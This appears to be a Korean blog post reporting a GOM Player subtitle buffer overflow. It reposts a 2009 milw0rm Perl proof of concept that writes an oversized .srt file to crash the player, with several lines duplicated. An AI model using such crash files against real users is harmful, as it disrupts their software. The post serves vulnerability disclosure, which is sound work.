반응형
곰플레이어 취약점 발생 3월 18일에 나오고 난 후 한달만에 다른 취약점이 발견되었다.
전 세계 많은 사람들이 곰플레이어를 사용한다는 것이 자랑스럽다 ㅎㅎ
<관련주소>
- http://security.bkis.vn/?p=501
<GOM Player Subtitle Buffer Overflow Vulnerabiltity POC>
#!/usr/local/bin/perl
#!/usr/local/bin/perl
##################################################################
#
# Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity
# Discovery by : Bui Quang Minh
# Tested : GOM Player 2.1.16.6134
# Reference : Bkis [http://security.bkis.vn/?p=501]
# PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#
##################################################################
#
# Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity
# Discovery by : Bui Quang Minh
# Tested : GOM Player 2.1.16.6134
# Reference : Bkis [http://security.bkis.vn/?p=501]
# PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#
##################################################################
my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";
my $filename = "gomdos.srt";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";
# milw0rm.com [2009-04-08]
댓글